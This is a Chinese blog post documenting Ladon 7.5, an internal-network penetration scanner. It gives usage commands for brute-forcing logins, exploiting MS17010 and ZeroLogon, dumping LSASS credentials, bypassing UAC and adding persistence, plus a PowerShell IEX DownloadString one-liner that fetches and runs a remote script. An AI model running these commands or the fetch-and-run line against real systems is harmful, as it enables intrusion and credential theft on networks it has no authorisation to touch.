[原创]Ladon7.5大型内网渗透扫描器Cobalt Strike
Ladon 7.5 20201010
Ladon for Windows
Ladon GUI
Ladon for Cobalt Strike
Ladon for PowerShell
Python Ladon
Ladon for Linux
使用说明
ID | 主题 | URL |
---|---|---|
0 | Ladon文档主页 | https://k8gege.org/Ladon/ |
1 | Ladon基础文档 | http://k8gege.org/p/648af4b3.html |
2 | Ladon用法例子 | http://k8gege.org/Ladon/example.html |
3 | 基础用法详解 | https://github.com/k8gege/Ladon/wiki/Ladon-Usage |
4 | Cobalt Strike | https://github.com/k8gege/Aggressor |
5 | Exp生成器使用 | https://github.com/k8gege/Ladon/wiki/LadonExp-Usage |
6 | 高度自定义插件 | https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle |
7 | 外部模块参考 | https://github.com/k8gege/K8CScan/wiki |
8 | PowerLadon | https://github.com/k8gege/powerladon |
9 | PythonLadon | https://github.com/k8gege/PyLadon |
10 | LinuxLadon | https://github.com/k8gege/KaliLadon |
12 | 漏洞演示视频 | https://github.com/k8gege/K8CScan/tree/master/Video |
13 | Ladon6.0文档 | http://k8gege.org/p/56393.html |
14 | Ladon6.2文档 | http://k8gege.org/p/39070.html |
13 | Ladon6.4文档 | http://k8gege.org/p/55476.html |
16 | Ladon6.5文档 | http://k8gege.org/Ladon/WinShell.html |
源码编译
git clone https://github.com/k8gege/Ladon.git
使用VS2012或以上版本分别编译.net 3.5、4.0版本EXE
成品下载
https://github.com/k8gege/Ladon/releases
Win7/2008或安装.net 2.x 3.x系统可使用Ladon.exe
Win8-win10或安装.net 4.x系统可使用Ladon40.exe
前言
无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高。
但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率。
漏洞时效性1-2天,扫描内网或外网需1周时间,是否会因此错过很多或许可成功的漏洞?
对于那些拥有几百上千域名的大站来说,你发现越快成功率就越高,慢管理员就打补丁了。
因此我们需要一个支持批量C段/B段甚至A段的扫描器,添加自定义模块快速检测新出漏洞。
关于Ladon
Ladon音译: 拉登或拉冬。因集成了很多模块,每个模块又可独立成为一个工具,和百头巨龙有很多头类似。
Ladon是希腊神话中的神兽,看守金苹果的百头巨龙。它从不睡觉,被赫拉克勒斯借扛天巨人之手诱巨龙睡着
杀死巨龙并偷得了金苹果。巨龙死前将自己的魂魄封印在金苹果中,偷盗者将金苹果送给了白雪公主,公主
为了报恩将金苹果分给了七个小矮人,吃下以后他们变成了龙珠散落到世界各地,龙珠分为七颗,它蕴含着
可以令奇迹发生的力量。当集齐7颗龙珠念出咒语,就能召唤神龙,而神龙则会实现召唤者提出的一个愿望。
程序简介
Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。7.5版本内置100个功能模块,外部模块18个,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列等,密码爆破13种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(wmiexe/psexec/atexec/sshexec/jspshell),Web指纹识别模块可识别75种(Web应用、中间件、脚本类型、页面类型)等,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。
使用简单
虽然Ladon功能丰富多样,但使用却非常简单,任何人都能轻易上手
只需一或两个参数就可用90%的功能,一个模块相当于一个新工具
运行环境
Windows
Ladon.exe可在安装有.net 2.0及以上版本Win系统中使用(Win7后系统自带.net)
如Cmd、PowerShell、远控Cmd、WebShell等,以及Cobalt Strike内存加载使用
Ladon.ps1完美兼容win7-win10 PowerShell,不看版本可远程加载实现无文件渗透
Linux、Mac
安装Mono运行时,将KaliLodan改名为Ladon,通过mono执行Ladon即可。
apt install mono-runtime
wget https://github.com/k8gege/Ladon/raw/master/KaliLadon -O Ladon
mono Ladon 192.168.1.8/24 OnlinePC
由于mono的兼容性,不保证Mac或Linux下所有功能均可用
就对于Ladon功能的测试来看Kali的兼容性要比Ubuntu好
测试发现有些功能的稳定性以及速度没有Windows系统快
未列功能系未测试或暂不可用功能,使用前请先看说明
实测:在Kali 2019下可使用功能较多,Ubuntu兼容性比不上Kali,MacOS未对所有功能进行测试
奇葩条件
实战并不那么顺利,有些内网转发后很卡或无法转发,只能将工具上传至目标
有些马可能上传两三M的程序都要半天甚至根本传不了,PY的几十M就更别想了
Ladon采用C#研发,程序体积很小500K左右,即便马不行也能上传500K程序吧
还不行也可PowerShell远程内存加载,这点是PY或GO编译的大程序无法比拟的
宗旨
一条龙服务,为用户提供一个简单易用、功能丰富、高度灵活的扫描工具
特色
扫描流量小
程序体积小
功能丰富强大
程序简单易用
插件支持多种语言
跨平台(Win/Kali/Ubuntu)等
支持Cobalt Strike插件化
支持PowerShell无文件渗透
Exp生成器可一键定制Poc
多版本适用各种环境
程序参数功能
1 支持指定IP扫描
2 支持指定域名扫描
3 支持指定机器名扫描
4 支持指定C段扫描(ip/24)
5 支持指定B段扫描(ip/16)
6 支持指定A段扫描(ip/8)
7 支持指定URL扫描
8 支持批量IP扫描(ip.txt)
9 支持批量C段扫描(ip24.txt)
10 支持批量B段扫描(ip16.txt)
11 支持批量URL扫描(url.txt)
12 支持批量域名扫描(domain.txt)
13 支持批量机器名扫描(host.txt)
14 支持批量字符串列表(str.txt)
15 支持主机帐密列表(check.txt)
16 支持用户密码列表(userpass.txt)
17 支持指定范围C段扫描
18 支持参数加载自定义DLL(仅限C#)
19 支持参数加载自定义EXE(仅限C#)
20 支持参数加载自定义INI配置文件
21 支持参数加载自定义PowerShell
22 支持自定义程序(系统命令或第三方程序即任意语言开发的程序或脚本)
23 插件(支持多种语言C#/Delphi/Golang/Python/VC/PowerShell)
24 支持Cobalt Strike(beacon命令行下扫描目标内网或跳板扫描外网目标)
25 支持CIDR格式IP扫描,如100.64.0.0/10,192.168.1.1/20等
26 INI配置支持自定义程序密码爆破
内置功能模块(78)
0x001 资产扫描(11)
例子: Ladon OnlinePC(扫当前机器所处C段,其它模块同理)
例子: Ladon 192.168.1.8/24 OnlinePC
ID | 模块名称 | 功能说明 | 返回结果 |
---|---|---|---|
1 | Ping | 存活主机扫描 | 存活IP(探测速度很快3-6秒/C段) |
2 | OnlinePC | 存活主机扫描 | 存活IP、Mac地址、机器名、设备制造商 |
3 | OnlineIP | 仅存活主机IP | 存活IP |
4 | UrlScan | URL域名扫描 | 同服URL(不验证IP、域名、Web标题) |
5 | SameWeb | 同服域名扫描 | 同服URL(验证IP、域名、Web标题) |
6 | WebScan | Web信息扫描 | 存活IP、主机名、Banner、Web标题 |
7 | WebDir | 后台目录扫描 | 地址、HTTP状态 |
8 | SubDomain | 子域名爆破 | 子域名 (可用DomainIP/HostIP解析) |
9 | DomainIP | 域名解析IP | 域名、IP |
10 | HostIP | 主机名转IP | IP、域名 |
11 | AdiDnsDump | 域内机器信息获取(非域内请使用LdapScan探测) | IP、域名 |
0x002 指纹识别/服务识别(9)
例子: Ladon OsScan
例子: Ladon 192.168.1.8/24 OsScan
ID | 模块名称 | 功能说明 | 返回结果 |
---|---|---|---|
1 | OsScan | 操作系统版本探测 | 存活IP、工作组\机器名、操作系统、开放服务 |
2 | PortScan | 端口扫描含Banner | 主机名、开放端口、服务识别、Banner、Web |
3 | WhatCMS | 86种Web指纹识别 | URL、CMS、邮件系统、登陆页面、中间件(如Apache\Tomecat\IIS)等 |
4 | CiscoScan | 思科设备扫描 | 存活IP、设备型号、主机名、Boot、硬件版本 |
5 | EnumMssql | 枚举Mssql数据库主机 | 数据库IP、机器名、SQL版本 |
6 | EnumShare | 枚举网络共享资源 | 域、存活IP、共享路径 |
7 | LdapScan | 不指定密码时,仅探测LDAP服务器 | IP是否LDAP服务器 |
8 | FtpScan | 不指定密码时,仅探测FTP服务器 | IP是否FTP服务器 |
9 | EthScan | 多网卡主机探测 |
0x003 口令检测/密码爆破(18)
[自定义端口(IP:端口)、帐密检测(用户 密码)、主机帐密检测(IP 端口 数据库 用户 密码)]
例子: Ladon SshScan
例子: Ladon 192.168.1.8/24 SshScan
例子: Ladon 192.168.1.8:22 SshScan (指定端口)
例子: Ladon test.rar RarScan
ID | 模块名称 | 功能说明 | 返回结果 | 依赖 |
---|---|---|---|---|
1 | SmbScan | SMB密码爆破(Windows) | 检测过程、成功密码、LOG文件 | |
2 | WmiScan | Wmi密码爆破(Windowns) | 检测过程、成功密码、LOG文件 | |
3 | NbtScan | Ipc密码爆破(Windows) | 检测过程、成功密码、LOG文件 | |
4 | LdapScan | AD域密码爆破(Windows) | 检测过程、成功密码、LOG文件 | |
5 | SmbHashScan | SMB HASH密码爆破(Windows) | 检测过程、成功密码、LOG文件 | |
6 | WmiHashScan | WMI HASH密码爆破(Windows) | 检测过程、成功密码、LOG文件 | |
7 | SshScan | SSH密码爆破(Linux) | 检测过程、成功密码、LOG文件 | |
8 | MssqlScan | Mssql数据库密码爆破 | 检测过程、成功密码、LOG文件 | |
9 | OracleScan | Oracle数据库密码爆破 | 检测过程、成功密码、LOG文件 | |
10 | MysqlScan | Mysql数据库密码爆破 | 检测过程、成功密码、LOG文件 | |
11 | WeblogicScan | Weblogic后台密码爆破 | 检测过程、成功密码、LOG文件 | |
12 | VncScan | VNC远程桌面密码爆破 | 检测过程、成功密码、LOG文件 | |
13 | FtpScan | Ftp服务器密码爆破 | 检测过程、成功密码、LOG文件 | |
14 | RarScan | Rar压缩包密码爆破 | 检测过程、成功密码、LOG文件 | Rar.exe |
15 | TomcatScan | Tomcat后台登陆密码爆破 | 检测过程、成功密码、LOG文件 | |
16 | HttpBasicScan | HttpBasic401认证密码爆破 | 检测过程、成功密码、LOG文件 | |
17 | WinrmScan | Winrm认证密码爆破 | 检测过程、成功密码、LOG文件 | |
18 | NbtScan | Netbios密码爆破 | 检测过程、成功密码、LOG文件 |
0x004 漏洞检测/漏洞利用(11)
例子: Ladon MS17010
例子: Ladon 192.168.1.8/24 MS17010
例子: Ladon http://192.168.1.8 WeblogicExp
ID | 模块名称 | 功能说明 |
---|---|---|
1 | MS17010 | SMB漏洞检测(CVE-2017-0143/CVE-2017-0144/CVE-2017-0145/CVE-2017-0146/CVE-2017-0148) |
2 | SMBGhost | SMBGhost远程溢出漏洞检测 (CVE-2020-0796) |
3 | WeblogicPoc | Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)
4 | PhpStudyPoc | PhpStudy后门检测(phpstudy 2016/phpstudy 2018)
5 | ActivemqPoc | ActiveMQ漏洞检测(CVE-2016-3088)
6 | TomcatPoc | Tomcat漏洞检测(CVE-2017-12615)
7 | WeblogicExp | Weblogic漏洞利用(CVE-2019-2725)
8 | TomcatExp | Tomcat漏洞利用(CVE-2017-12615)
9 | Struts2Poc | Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)
10 | ZeroLogon | CVE-2020-1472域控提权漏洞EXP
11 | CVE-2020-0688 | CVE-2020-0688 Exchange序列化漏洞利用
0x005 加密解密(4)
例子: Ladon 字符串 EnHex
例子: Ladon EnHex (批量str.txt)
ID | 模块名称 | 功能说明 |
---|---|---|
1 | EnHex | 批量Hex密码加密 |
2 | DeHex | 批量Hex密码解密 |
3 | EnBase64 | 批量Base64密码加密 |
4 | DeBase64 | 批量Base64密码解密 |
0x006 下载功能(2)
下载功能主要用于内网文件传输或者将VPS文件下载至目标机器
ID | 模块名称 | 功能说明 | 用法 |
---|---|---|---|
1 | HttpDownLoad | HTTP下载 | Ladon HttpDownLoad http://k8gege.org/test.exe |
2 | FtpDownLoad | Ftp下载 | Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe |
0x007 网络嗅探(3)
基于Socket RAW嗅探,无需安装Winpcap,但需管理员权限
主要用于发现内网存活机器或嗅探管理员登陆FTP或WEB站点密码
后续可能会添加其它功能可能另外写个专门用于嗅探的工具
PS: 目前网上大部嗅探工具都是基于Winpcap抓包,某些机器针对其做限制,会提示找不到网卡无法嗅探。
重点是不少程序不是GUI就是只能在Linux下用,如果你用py的SCAPY(需winpcap)来实现发现程序高达48M
当然也可用于发现恶意木马上线地址(如Cobal strike默认一分钟才发包的netstat不一定看得到)
ID | 模块名称 | 功能说明 | 用法 |
---|---|---|---|
1 | FtpSniffer/SnifferFtp | Ftp密码嗅探 | Ladon FtpSniffer 192.168.1.5 |
2 | HttpSniffer/SnifferHTTP | HTTP密码嗅探 | Ladon HTTPSniffer 192.168.1.5 |
3 | Sniffer | 网络嗅探(源地址、目标地址) | Ladon Sniffer |
0x008 密码读取(2)
ID | 模块名称 | 功能说明 | 用法 |
---|---|---|---|
1 | EnumIIS/IisWeb | IIS站点密码读取 | Ladon EnumIIS 或 Ladon IisWeb |
2 | DumpLsass | DumpLsass内存密码 | Ladon DumpLsass |
0x009 信息收集(11)
ID | 模块名称 | 功能说明 | 用法 |
---|---|---|---|
1 | EnumProcess/ProcessList/tasklist | 进程详细信息 | Ladon EnumProcess 或 Ladon Tasklist |
2 | GetCmdLine/CmdLine | 获取命令行参数 | Ladon cmdline 或 Ladon cmdline cmd.exe |
3 | GetInfo/GetInfo2 | 获取渗透基础信息 | Ladon GetInfo 或 Ladon GetInfo2 |
4 | GetPipe | 查看本机命名管道 | Ladon GetPipe |
5 | RdpLog | 查看3389连接记录 | Ladon RdpLog |
6 | QueryAdmin | 查看管理员组用户 | Ladon QueryAdmin |
7 | NetVer | 查看安装.NET版本 | Ladon NetVer 或 Ladon NetVersion |
8 | PsVer | 查看PowerShell版本 | Ladon PsVer 或 Ladon PSVersion |
9 | whoami | 查看当前用户与特权 | Ladon whoami |
10 | recent | 查看用户最近访问文件 | Ladon recent |
11 | AllVer | 获取已安装程序列表 | Ladon AllVer |
0x010 远程执行(7)
ID | 模块名称 | 功能说明 | 用法 |
---|---|---|---|
1 | WmiExec | 135端口执行命令 | http://k8gege.org/Ladon/WinShell.html |
2 | PsExec | 445端口执行命令 | http://k8gege.org/Ladon/WinShell.html |
3 | AtExec | 445端口执行命令 | http://k8gege.org/Ladon/WinShell.html |
4 | SshExec | 22端口执行命令 | http://k8gege.org/Ladon/WinShell.html |
5 | JspShell | Jsp一句话执行命令 | http://k8gege.org/p/ladon_cs_shell.html |
6 | WebShell | WebShell执行命令 | http://k8gege.org/Ladon/webshell.html |
7 | WinrmExec | 5895端口执行命令 | http://k8gege.org/Ladon/WinrmExec.html |
0x011 提权降权(7)
ID | 模块名称 | 功能说明 | 用法 |
---|---|---|---|
1 | BypassUac | 绕过UAC执行,支持Win7-Win10 | Ladon BypassUac c:\1.exe 或 Ladon BypassUac c:\1.bat |
2 | GetSystem | 提权或降权运行程序 | Ladon GetSystem cmd.exe 或 Ladon GetSystem cmd.exe explorer |
3 | Runas | 模拟用户执行命令 | Ladon Runas user pass cmd |
4 | ms16135 | 提权至SYSTEM | Ladon ms16135 whoami |
5 | BadPotato | IIS或服务用户提权至SYSTEM | Ladon BadPotato cmdline |
6 | SweetPotato | IIS或服务用户提权至SYSTEM | Ladon SweetPotato cmdline |
7 | RDPHijack | 远程桌面会话劫持 | Ladon RDPHijack sessionID |
0x012 反弹Shell(4)
ID | 模块名称 | 功能说明 | 协议 |
---|---|---|---|
1 | netcat | 反弹Shell系列教程 | TCP |
2 | MSF_Shell | 反弹Shell系列教程 | TCP/HTTP/HTTPS |
3 | PowerCat | 反弹Shell系列教程 | TCP/UDP/ICMP |
4 | MSF_Meter | 反弹Shell系列教程 | TCP/HTTP/HTTPS |
0x013 其它功能(12)
ID | 模块名称 | 功能说明 | 用法 |
---|---|---|---|
1 | EnableDotNet | 一键启用.net 3.5(2008系统默认未启用) | Ladon EnableDotNet |
2 | gethtml | 获取内网站点HTML源码 | Ladon gethtml http://192.168.1.1 |
3 | CheckDoor | 检测后门(网上公开多年的) | Ladon CheckDoor 或 Ladon AutoRun |
4 | GetIP | 获取本机内网IP与外网IP | Ladon GetIP |
5 | Open3389 | 一键开启3389 | Ladon Open3389 |
6 | ActiveAdmin | 激活内置用户Administrator | Ladon ActiveAdmin |
7 | ActiveGuest | 激活内置用户Guest | Ladon ActiveGuest |
8 | RunPS | 无PowerShell.exe执行PowerShell脚本 | Ladon RunPS *.ps1 |
9 | RegAuto | 添加注册表RUN启动项 | |
10 | sc | 服务加启动项(system权限) | |
11 | sc | 服务执行程序(system权限) | |
12 | at | 计划执行程序(无需时间)(system权限) |
注:以上仅是该工具内置模块的初级用法,外置插件或更高级用法请查看使用文档
中级用法INI文件配置调用任意程序、系统命令、各种语言现成EXP的批量利用
高级用法Exp生成器一键生成Poc,使用各种语言编写插件扩展Ladon扫描能力。
外部插件模块(19)
ID | 功能 | 实现语言 | 功能说明 |
---|---|---|---|
1 | 漏洞扫描 | C语言 | CVE 2019-0708 Windows Rdp 3389漏洞批量检测 |
2 | 漏洞利用 | Exp生成器 | ThinkPHP 5.0.22 5.1.29 RCE GetShell Exploit |
3 | 漏洞利用 | Python | CVE-2019-9621 Zimbra GetShell Exploit |
4 | 漏洞利用 | Python | CVE-2019-0604 SharePoint GetShell Exploit |
5 | 漏洞利用 | Exp生成器 | CVE 2016-3088 ActiveMQ GetShell Exploit |
6 | 漏洞利用 | Python | Apache Solr 8.2.0 Velocity RCE 0day Exploit |
7 | 漏洞利用 | Exp生成器 | PhpStudy后门 GetShell Exploit |
8 | 命令执行 | INI配置 | INI调用外部程序命令批量Linux上控 |
9 | 命令执行 | INI配置 | INI调用外部程序命令批量Windowns上控 |
10 | 漏洞扫描 | Python | PHP-FPM 远程代码执行漏洞(CVE-2019-11043) |
11 | 漏洞扫描 | Exp生成器 | Weblogic CVE-2018-2894漏洞检测 |
12 | 漏洞利用 | PowerShell | MS17010EXP 永恒之蓝漏洞利用 |
13 | 脚本调用 | PowerShell | Kali 2019无PowerShell执行脚本 |
14 | 口令扫描 | INI配置 | ipcscan.ini INI插件之Ipc密码爆破 |
15 | 口令扫描 | INI配置 | smbscan.ini INI插件之Smb密码爆破 |
16 | 口令扫描 | INI配置 | smbhash.ini INI插件之NtlmHash爆破 |
17 | 口令扫描 | INI配置 | winrmscan.ini INI插件之Winrm密码爆破 |
18 | 信息收集 | .NET | 检测网站是否使用Shiro |
19 | 漏洞扫描 | Python | 域控提权CVE-2020-1472-EXP |
文档参考Cscan: https://github.com/k8gege/K8CScan/wiki
中级用法
批量扫描
0x001 参数 ip/24 ip/16 ip/8
命令: Ladon 192.168.1.8/24 OnlinePC
0x002 文件 ip.txt ip24.txt ip16.txt url.txt host.txt domain.txt str.txt
程序根目录下创建对应文件即可,如批量扫描多个ip使用ip.txt,批量扫多个C段使用ip24.txt
无需指定txt程序会自动加载文件进行扫描,如扫描存活主机只需命令: Ladon OnlinePC
禁ping扫描
默认扫描会先通过icmp扫描主机是否存活,当使用工具转发内网
或者目标机器禁ping时,使用noping参数进行扫描,速度稍慢一点
Ladon noping
Ladon noping 192.168.1.8/24
Ladon noping 192.168.1.8/24 MS17010
Socks5代理扫描
详见:http://k8gege.org/Ladon/proxy.html
linux/macos下KaliLadon
proxychains mono Ladon noping 192.168.1.8/24 MS17010
proxychains mono Ladon noping http://192.168.1.1 WhatCMS
windows下Ladon.exe
推荐proxifier 3.42及以上版本,最好是最新版4.0.1
例子:扫描目标10.1.2段是否存在MS17010漏洞(必须加noping)
Ladon noping 10.1.2.8/24 MS17010
配置INI调用任意程序、密码爆破
适用场景,需调用相关命令或第三方工具进行批量操作
或者有新的POC,但来不及或无法写成DLL来调用时
很多第3方工具不支持批量或者说根本不支持批量网段
而Ladon不只限于批量IP、URL、IP段、任意内容等
是紧急情况下最适合用于验证内网是否存在漏洞工具
新的漏洞来时你能调好POC就不错了,批量更要时间
调用系统ping命令进行存活主机探测
ping.ini
[Ladon]
exe=cmd.exe
arg=/c ping ipipip
命令: Ladon ping.ini
命令: Ladon 192.168.1.8/24 ping.ini
调用Python poc批量检测漏洞
[Ladon]
exe=F:\Python279\python.exe
arg=CVE-2019-11043-POC.py ipipip
例子: https://github.com/k8gege/CVE-2019-11043
自定义程序密码爆破
例子:调用修改过的smbexec.exe进行HASH密码验证,原版不退出无法爆破
根目录下放4个文件,smbexec.exe、smbhash.ini、user.txt、pass.txt。
smbhash.ini
[Ladon]
exe=smbexec.exe
arg=-hashes passpasspass useruseruser@ipipip
isok=Launching semi-interactive shell
port=445
log=true
INI参数说明
isok:成功标志,必填项。如smbexec成功时返回"Launching semi-interactive shell"
port:对应端口,非必填。如SMB为445,Ladon先检测到端口开放,才进行密码爆破
log: 程序日志,非必填。如有些程序返回一堆错误结果,我们不想看,可不显示
检测内网C段是否使用同一个密码,命令:Ladon 192.168.1.1/24 smbhash.ini
详见:http://k8gege.org/p/53177.html
配置端口扫描参数
port.txt自定义端口
使用PortScan模块时,默认扫描常见高危漏洞端口
遇到修改了默认端口的,Ladon就无法扫描了吗?
使用port.txt
格式1:80,21,1433,3306,445
格式2:80-88,21-23,5800-5900
格式3:
21
23
80
格式4:
80-88
21-23
命令行自定义端口
Ladon 192.168.1.8/24 PortScan 80-89
Ladon 192.168.1.8-192.168.1.200 PortScan 22,80,1433,21,3306,1521
配置密码爆破参数
1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此
2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密
3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认
user.txt和pass.txt分别存放用户、密码
userpass.txt存放用户密码组,即每行存放用户以及密码
check.txt每行存放IP\端口\用户\密码
数据库口令检测
数据库与其它密码爆破不同,有时数据库做了权限,指定用户只能连指定库,连默认库肯定不行
mssql密码验证
(大型内网可能从其它机器收集到大量机器密码,第一步肯定是先验证)
非默认端口请将以下端口改成被修改端口即可,单个IP可直接Ladon IP:端口 MssqlScan扫描
check.txt
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
命令: Ladon MssqlScan
oracle同理
192.168.1.8 1521 orcl system k8gege
192.168.1.8 orcl system k8gege
192.168.1.8 system k8gege
命令: Ladon OracleScan
mysql无需指定数据库名
192.168.1.8 3306 root k8gege
192.168.1.8 root k8gege
命令: Ladon MysqlScan
系统密码
SSH密码爆破
check.txt
192.168.1.8 22 root k8gege
192.168.1.8 root k8gege
命令: Ladon SshScan
详细用法:http://k8gege.org/Ladon/sshscan.html
SMB/WMI密码爆破
check.txt
192.168.1.8 admin k8gege
命令: Ladon WmiScan 或 Ladon SmbScan
NTLM HASH密码爆破
check.txt
192.168.1.8 admin k8gege
命令: Ladon WmiScan 或 Ladon SmbScan
网站密码
weblogic密码爆破
check.txt(url 用户 密码)
http://192.168.1.8:7001/console weblogic k8gege
命令: Ladon WeblogicScan
文件密码
RAR文件密码爆破
因Rar压缩包只需一个密码,故只需pass.txt,注意中文密码需将txt保存为Ansi编码
命令: Ladon test.rar RarScan
PowerShell
PowerLadon完美兼容win7-win10 PowerShell,对于不支持.net程序插件化的远控,可使用
PowerShell版,也可CMD命令行下远程加载内存实现无文件扫描,模块加载后用法和EXE一致。
0x001 PowerShell本地加载
适用于支持PowerShell交互远控或Shell,如Cobalt Strike
> powershell
> Import-Module .\Ladon.ps1
> Ladon OnlinePC
0x002 Cmd本地加载
适用于还没跟上时代的远控或Shell只支持CMD交互
> powershell Import-Module .\Ladon.ps1;Ladon OnlinePC
0x003 Cmd远程加载
适用于还没跟上时代的远控或Shell只支持CMD交互
> powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5:800/Ladon.ps1'); Ladon OnlinePC"
0x004 远控交互式CMD
0x005 菜刀非交互CMD
0x006 Empire非交互CMD
Empire的shell有点问题,分号被截断,可以加个cmd /c
0x007 MSF交互式CMD
高级用法
Ladon最初的设计就是一款扫描框架,为了方便才内置功能
毕竟需要使用一个功能就得在目标多上传一个文件是顶麻烦的
不像MSF框架和模块多大都无所谓,因为你只是在本地使用
为了让大家都可以自定义模块,Ladon插件支持多种编程语言
最菜可通过INI配置插件,了解HTTP可通过EXP生成器生成POC
懂得编程可使用C#、Delphi、VC编写DLL,PowerShell脚本
0x001 Exp生成器
EXP生成器教程: https://github.com/k8gege/Ladon/wiki/LadonExp-Usage
实战例子: https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-CVE-2018-2894
0x002 自定义模块教程
自定义模块教程: https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle
0x003 插件例子源码
https://github.com/k8gege/Ladon/raw/master/MoudleDemo.rar
Ladon下载
历史版本: https://github.com/k8gege/Ladon/releases
7.0版本:https://k8gege.org/Download
7.5版本:K8小密圈
[原创]Ladon7.5大型内网渗透扫描器Cobalt Strike相关推荐
- 内网渗透工具Cobalt Strike 基础使用
Cobalt Strike:C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透. Cobalt Strike一款GUI的框架式渗透工具,集成了端口转发.服务扫描,自动 ...
- [原创]K8Cscan 3.8大型内网渗透自定义扫描器(支持批量C段/B段/A段/IP列表/URL列表/跨网段扫描)
前言:无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高 但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率 漏洞时效性1-2天,扫描内网或外网 ...
- [原创]K8 cping 3.0大型内网渗透扫描工具
[原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介: 何为自定义扫描器?其实也是插件化,但 ...
- 网络靶场实战-记一次大型内网渗透实践 【一】
本场景是基于"火天网境攻防演训靶场"进行搭建,通过靶场内置的演训导调.演训裁判以及演训运维功能,可以对整个攻防演练过程进行管控和详尽的评估与复盘. 1.场景准备 · 场景名称 某大 ...
- 内网安全:Cobalt Strike 工具 渗透多层内网主机.(正向 || 反向)
内网安全:Cobalt Strike 工具 渗透多层内网主机. Cobalt Strike 是一款以 metasploit 为基础的 GUI 的框架式渗透工具,又被业界人称为 CS.拥有多种协议主机上 ...
- 网络靶场实战-记一次大型内网渗透实践 【完结篇】
本场景是基于"火天网境攻防演训靶场"进行搭建,通过靶场内置的演训导调.演训裁判以及演训运维功能,可以对整个攻防演练过程进行管控和详尽的评估与复盘. 1.场景回顾 上回书说到通过一系 ...
- [原创]K8域控植入脚本生成器(内网渗透/RPC不可用解决方案)
[原创]K8域控植入脚本生成器(内网渗透/RPC不可用解决方案) 参考文章: (1)[原创]K8域控植入脚本生成器(内网渗透/RPC不可用解决方案) (2)https://www.cnblogs.co ...
- 【内网渗透】内网基础知识梳理
内网基础知识文章目录 前言 一.内网概述 二.常见的专有名词 1.工作组 1.1如何加入.创建工作组? 1.2如何退出工作组? 2.域 2.1域的分类 单域 父域.子域 域树(tree) 域森林(fo ...
- 内网渗透系列:内网渗透思路整理
目录 前言 一.整体概述 1.攻击思路 2.敏感信息 3.攻击过程 二.信息收集 1.主机发现 2.端口扫描 3.漏洞扫描 4.识别内网环境 (1)办公网 (2)生产网 三.漏洞验证 / 漏洞攻击 ( ...
- 安全学习概览——恶意软件分析、web渗透、漏洞利用和挖掘、内网渗透、IoT安全分析、区块链、黑灰产对抗...
1 基础知识 1.1 网络 熟悉常见网络协议: https://www.ietf.org/standards/rfcs/ 1.2 操作系统 1.3 编程 2 恶意软件分析 2.1 分类 2.1.1 木 ...
最新文章
- 如何运用下载来的模板
- 如何用hover写出顺畅的动态效果
- W - Pasha and Phone CodeForces - 595B (收益颇丰的数学题
- XML Schema简介
- Jenkins系统上的时间不正确问题
- VS2019中在源文件中如何使用自己写的头文件(保姆级教程)
- 【TensorFlow-windows】学习笔记一——基础理解
- 读梁宁《一次失控引发的信任评估---我看胡紫薇事件》
- Scala学习笔记06:自定义控制结构
- 【ES】ES 7.6报错 SearchPhaseExecutionException: all shards failed OutOfMemoryError
- MAMP 无法启动Mysql,错误信息Can't start server : Bind on unix socket: Address already in use...
- iOS平台软件开发工具(一)-新建的工程使用CocoaPods工具集成第三方框架
- Top 10 盘点:2019 Java 开发者必学的测试框架、工具和库!
- Hexo文章图片存储选七牛(当然支持MD都可以)
- ETL数据导入/导出工具 HData
- 盛大进军语音识别领域:将开源哼唱搜索技术
- 保姆级 nas 服务器搭建手册
- 全国高校json文件
- 郭炜实用Python程序设计慕课:chapter13面向对象程序设计
- 服务器配置公网ftp服务端(软件和python代码两种方法)